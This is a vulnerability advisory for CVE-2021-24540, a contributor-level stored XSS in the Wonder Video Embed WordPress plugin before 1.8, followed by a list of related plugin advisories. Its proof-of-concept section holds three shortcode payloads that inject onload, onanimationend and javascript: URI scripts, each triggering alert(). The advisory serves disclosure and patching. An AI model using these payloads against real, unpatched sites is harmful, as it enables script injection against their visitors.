Wonder Video Embed < 1.8 – Contributor+ Stored XSS | CVE 2021-24540 | Plugin Vulnerabilities

Description

The plugin does not escape parameters of its wonderplugin_video shortcode, which could allow users with a role as low as Contributor to perform Stored XSS attacks.

Proof of Concept

[wonderplugin_video iframe='youtube.com?v=dQw4w9WgXcQ" onload="alert(1)' videocss='animation-name:twentytwentyone-close-button-transition" onanimationend="alert(2)']

[wonderplugin_video iframe="javascript:alert('wistia')"]

[wonderplugin_video videotype="mp4" lightbox="a" mp4="javascript:alert(3)" videowidth="100" videoheight="100" webm='" style="animation-name:twentytwentyone-close-button-transition;display:block;width:100px;height:100px;" onanimationend="alert(4)']

Affects Plugins

wonderplugin-video-embed

Fixed in 1.8

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

67910e5d-ea93-418b-af81-c50d0e05d213

Timeline

Publicly Published

2021-07-19 (about 4 years ago)

Added

2021-07-19 (about 4 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2024-09-30

Title

Social Auto Poster < 5.3.16 - Reflected Cross-Site Scripting

Published

2023-06-12

Title

ND Shortcodes < 7.0 - Contributor+ Stored XSS via Shortcodes

Published

2024-10-15

Title

Encyclopedia / Glossary / Wiki < 1.7.61 - Reflected Cross-Site Scripting

Published

2025-10-08

Title

Betheme < 28.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'page_title'

Published

2021-05-10

Title

LifterLMS < 4.21.1 - Authenticated Stored XSS in Edit Profile